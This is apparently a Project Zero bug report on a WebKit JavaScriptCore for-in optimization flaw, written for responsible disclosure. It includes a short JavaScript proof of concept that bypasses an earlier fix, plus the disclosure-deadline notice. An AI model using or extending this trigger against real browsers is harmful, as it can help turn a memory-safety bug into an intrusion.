|
|
WebKit: JSC: Incorrect for-in optimization #2 | |||
| Project Member Reported by lokihardt@google.com, Jul 5 | Back to list | |||
The following PoC bypasses the fix for the issue 1263 . PoC: function f() { let o = {}; for (let i in {xx: 0}) { for (i of [0]) { } print(o[i]); } } f(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
Project Member
Comment 1
by
lokihardt@google.com,
Sep 21
,
Oct 3
,
Oct 3
|
||||
| ► Sign in to add a comment | ||||